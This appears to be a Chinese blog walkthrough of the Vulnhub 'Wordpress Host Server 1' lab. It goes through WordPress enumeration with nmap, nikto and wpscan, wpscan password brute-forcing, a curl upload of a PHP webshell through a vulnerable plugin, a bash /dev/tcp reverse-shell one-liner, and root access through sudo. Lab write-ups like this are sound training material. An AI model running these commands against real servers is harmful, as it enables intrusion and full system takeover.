avatar
lucky blog
← 返回列表

Vulnhub Wordpress Host Server 1渗透

Vulnhub Wordpress Host Server: 1渗透

信息收集

使用扫描工具,扫描ip和端口

image-20241204091324580

使用fscan扫描地址

image-20241204091402353

15是kaili的ip,所以20就是靶机,通过扫描发现80端口是开启的

,在kali里面使用nmap在扫描一下

nmap -sS -n --open 192.168.110.20

image-20241204091537170

然后尝试访问目标的80,也就是http服务

image-20241204091642985

看到文章内容就可以知道这是一个wp的

使用nmap详细的扫一下,做一些简单信息收集

nmap -Pn -sV -p- -A -T4 192.168.110.20
nikto -h https://192.168.110.20

image-20241204092436363

image-20241204093600844

得知他是一个Wordpress 服务

一般Wordpress渗透思路是得到后台然后getshell

网上找到一些信息,得知后台地址wp-admin

kali也有个针对于Wordpress 的工具

wpscan --url https://192.168.110.20 -e u,p --disable-tls-checks

image-20241204093841183

这里发现

WordPress 版本是5.3.2有个bob的用户

信息收集总结:

靶场ip:192.168.110.20

开放端口,

22 sshu端口

80,http服务端口

443https安全协议端口

http/https服务是一个WordPress

WordPress 版本是5.3.2并且有个bob的用户

下面继续收集看看有没有可以利用的插件

1、刺探基础信息:
wpscan --url http://www.example.com

2、猜解后台用户名
wpscan --url http://www.example.com --enumerate u

3、使用字典暴破用户名admin的密码
wpscan --url http://www.example.com -P password.txt -U admin 

4、扫描插件
wpscan --url http://www.example.com --enumerate p

5、扫描易受攻击的插件
wpscan --url http://www.example.com --enumerate vp

6、扫描所有插件
wpscan --url http://www.example.com --enumerate ap
wpscan --url http://192.168.1.72 --enumerate ap --plugins-detection aggressive
建议扫描的时候使用aggressive模式,不然有些插件扫描不出来

image-20241204110614994

渗透

发现有很多的漏洞,都可以用,这里我用的是第一个

找一下这个

image-20241204110909376

cat /usr/share/exploitdb/exploits/php/webapps/37514.txt

image-20241204110949230

image-20241204111030052

先创建一个一句话木马文件

image-20241204111352945

curl -k -X POST -F "action=upload" -F "files=@/root/1.php" "http://192.168.110.20/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"

image-20241204111635420

上传之后文件路径: 靶机地址/wp-content/uploads/uigen_年份(比如今年2024就写uigen_2024)/你shell文件名

http://192.168.110.20/wp-content/uploads/uigen_2024/1.php

测试木马:

image-20241204111856773

可以用然后用工具连接

image-20241204112051766

提权

连接上之后,可以尝试反弹shell

kali:

rlwrap -cAr nc -lvnp 2233

靶机:
bash -i >& /dev/tcp/192.168.211.55/2233 0>&1

image-20241204112340641

image-20241204112400310

这里权限不高,可以尝试一下提权

find / -perm -u=s -type f 2> /dev/null

扫描能利用的命令

image-20241204112513675

尝试免密登录

image-20241204112605686

发现没有tty

但是可以sudo su

image-20241204112718543

这样就是root权限了

image-20241204112759544

至此渗透结束